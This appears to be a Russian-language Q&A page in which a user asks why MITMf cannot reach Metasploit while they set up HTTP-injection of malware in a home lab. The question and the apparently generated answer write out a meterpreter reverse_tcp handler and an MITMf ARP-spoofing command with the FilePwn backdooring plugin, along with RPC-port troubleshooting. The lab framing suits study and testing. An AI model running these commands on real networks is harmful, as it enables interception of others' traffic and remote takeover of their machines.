Посещая наш сайт, вы соглашаетесь с нашей политикой конфиденциальности в отношении файлов cookie, статистики отслеживания и т. д.

Главная » Вопросы и ответы » Информационная безопасность

MITMF не подключается к Metasploit (HTTP-инъекция)

На чтение 4 мин Опубликовано
Содержание
  1. Вопрос или проблема
  2. Ответ или решение
  3. 1. Проверка состояния Metasploit
  4. 2. Конфигурация MITMf
  5. 3. Изменение порта Metasploit
  6. 4. Установка и обновление MITMf
  7. 5. Проверка зависимостей и окружения
  8. Заключение

Вопрос или проблема

Я пытаюсь внедрить вредоносный код в http-запрос. У меня есть личный LAMP-сервер, виртуальная машина Kali и самая невероятная виртуальная машина Windows XP. Всё это находится в моей сети и легально. Я следовал этому учебнику.

https://youtu.be/FMahvXMYuT4

Я запустил Metasploit с помощью следующей команды

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.4
set LPORT 8843
exploit -j

Когда я смотрел видео, Metasploit говорит 

[*] Starting the payload handler...

С моей стороны он начинает с этого, а затем возвращает меня к консоли. Странно, но что же, предположим, так и должно быть.

Теперь я пытаюсь запустить mitmf в другом окне терминала

sudo ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.244 --filepwn

Теперь это сообщение об ошибке, которое я получаю от mitmf.

    [*] MITMf v0.9.8 - 'Темная сторона'
|
|_ Net-Creds v1.0 онлайн
|_ Spoof v0.6
|  |_ ARP spoofing включен
|_ FilePwn v0.3
|  |_ BDFProxy v0.3.2 онлайн
2018-07-17 02:23:27 [ARPpoisoner] Восстановление соединения 192.168.1.244 <-> 192.168.1.1 с 2 пакетами на хост
[Msfrpc] Ошибка подключения к Metasploit: HTTPConnectionPool(host="127.0.0.1", port=55552): Превышено максимальное количество попыток с url: /api/ (Причина: NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7fd9b7772290>: Не удалось установить новое соединение: [Errno 111] Соединение отклонено',))

Я немного погуглил и нашел эту тему.

https://github.com/byt3bl33d3r/MITMf/issues/343

Я следовал его инструкциям по двум командам и снова начал весь процесс без успеха. Я даже пытался изменить LPORT на 55552, но это тоже не сработало. Я не являюсь экспертом в Metasploit, поэтому даже не знаю, что искать. Как я могу дальше устранить эту неполадку?

Если вы используете Kali Linux, решите эту проблему, используя следующую команду для установки MITMf

apt-get install mitmf

Даже если оригинальные инструкции, предоставленные автором программного обеспечения, работают как ожидается и без ошибок, они все равно трагически ужасны.

Ответ или решение

MITMF не подключается к Metasploit (HTTP-инъекция): Решение проблемы

Проблема, с которой вы столкнулись, связана с ошибками подключения MITMf к Metasploit. Давайте подробно рассмотрим возможные причины и решения этой проблемы.

1. Проверка состояния Metasploit

Для начала убедитесь, что Metasploit правильно запущен и работает. Вы уже выполнили команду:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.4
set LPORT 8843
exploit -j

Ваша команда корректна, но попробуйте дополнительно убедиться, что:

  • Metasploit действительно запущен. Ваша консоль должна показывать сообщение, подтверждающее запуск.
  • Проверьте, слушает ли Metasploit на нужном порту. Можно использовать следующую команду для этого:
netstat -tuln | grep 8843

Эта команда покажет, слушает ли ваш Metasploit на порту 8843.

2. Конфигурация MITMf

Вы используете следующую команду для запуска MITMf:

sudo ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.244 --filepwn

Однако вы получаете сообщение об ошибке:

Error connecting to Metasploit: HTTPConnectionPool(host="127.0.0.1", port=55552): Max retries exceeded...

Это указывает на то, что MITMf не может подключиться к Metasploit на порту 55552.

3. Изменение порта Metasploit

Одним из решений будет изменить порт, на который MITMf пытается подключиться. Прежде всего, убедитесь, что вы используете правильный RPC-порт. Изменения, которые следует внести:

  1. Запустите Metasploit с RPC-сервером:
    Запустите следующую команду в консоли Metasploit:

    msfconsole -r <your-script.rc>

    Если вы используете msfrpcd, например:

    msfrpcd -p 55552 -n -e -o 127.0.0.1

    Это указало бы RPC-сервер слушать на порту 55552 на локальном хосте.

  2. Изменение конфигурации MITMf:
    После того как вы удостоверитесь, что Metasploit работает с правильным RPC-портом, убедитесь, что MITMf настроен на подключение к этому порту. Вам нужно найти настройки в MITMf, которые указывают, к какому порту подключаться, и изменить на 55552.

4. Установка и обновление MITMf

Если ничего из вышеперечисленного не работает, попробуйте выполнить переустановку MITMf через apt-get:

apt-get install mitmf

Это гарантирует, что у вас последняя версия MITMf с исправлениями ошибок и необходимыми зависимостями.

5. Проверка зависимостей и окружения

Убедитесь в актуальности всех зависимостей, которые могут быть необходимы для работы MITMf и Metasploit. Выполните:

apt-get update
apt-get upgrade

Также проверьте настройки вашей сети и убедитесь, что ваш Kali VM и Windows XP VM могут взаимодействовать друг с другом, и нет никаких брандмауэрных блокировок.

Заключение

Проблемы с подключением MITMf к Metasploit могут быть связаны с некорректной настройкой портов и зависимостями. Пройдитесь по всем предложенным шагам и проверьте настройки системы, это должно помочь вам восстановить связь между MITMf и Metasploit. Если после проверки всех вышеперечисленных шагов проблема остается, рассмотрите возможность публикации дополнительной информации о ваших настройках в соответствующих форумах для получения более детальной помощи.

man-in-the-middle mitmf
Оцените материал
Добавить комментарий

Капча загружается...

© 2024 IZ6.RU
*В материалах сайта упоминаются социальные сети Фейсбук / Инстаграм, принадлежащие Meta Platforms Inc., деятельность которой запрещена на территории РФ в части реализации данных социальных сетей на основании осуществления ею экстремистской деятельности